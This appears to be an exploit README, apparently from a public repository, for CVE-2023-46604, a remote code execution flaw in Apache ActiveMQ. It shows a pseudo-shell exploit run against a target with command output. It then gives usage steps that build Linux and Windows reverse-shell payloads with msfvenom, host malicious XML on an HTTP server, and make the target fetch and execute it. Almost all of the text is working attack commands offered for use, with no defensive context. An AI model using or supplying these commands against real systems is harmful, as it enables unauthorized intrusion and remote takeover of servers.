RCE CVE-2023-46604

$python3 exploit.py -i 10.129.230.87 -p 61616  -si 10.10.14.59 -sp 8080
#################################################################################
#  CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell      #
#  Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d              #
#################################################################################

[*] Target: 10.129.230.87:61616
[*] Serving XML at: <http://10.10.14.59:8080/poc.xml>
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit

#################################################################################
# Not yet connected, send a command to test connection to host.                 #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you      #
# want to re-check the connection.                                              #
#################################################################################

[Target not responding!]$ whoami
activemq

Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x  5 activemq activemq 4.0K Nov  7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov  6 01:18 ..
-rwxr-xr-x  1 activemq activemq  21K Apr 20  2021 activemq
-rwxr-xr-x  1 activemq activemq 6.1K Apr 20  2021 activemq-diag
-rw-r--r--  1 activemq activemq  17K Apr 20  2021 activemq.jar
-rw-r--r--  1 activemq activemq 5.5K Apr 20  2021 env
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-32
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-64
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 macosx
-rw-r--r--  1 activemq activemq  82K Apr 20  2021 wrapper.jar

Apache ActiveMQ$

exploit.py

poc.xml

282297599-38f280fa-2252-4161-acb3-9b92d3635eac.webm


Reverse Shell

This exploit builds upon the foundational work available at https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE). We have further developed the technique to achieve a reverse shell utilizing the Metasploit Framework (https://github.com/rapid7/metasploit-framework).

Usage:

Important: Manually change the IP Address (0.0.0.0 on line 11) in the XML files with the IP Address where the payload will be generated. If u follow the below commands it will be your Listner IP Addess. Also {IP_Of_Hosted_XML_File} will be your Listner IP Address.

For Linux/Unix Targets

git clone <https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell>

cd CVE-2023-46604-RCE-Reverse-Shell

msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf

python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml

For Windows Targets

git clone <https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell>

cd CVE-2023-46604-RCE-Reverse-Shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe

python3 -m http.server 8001

./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml

https://user-images.githubusercontent.com/66937297/280425582-db1b82e4-55ef-4f23-9df7-8a0cf99c01c4.png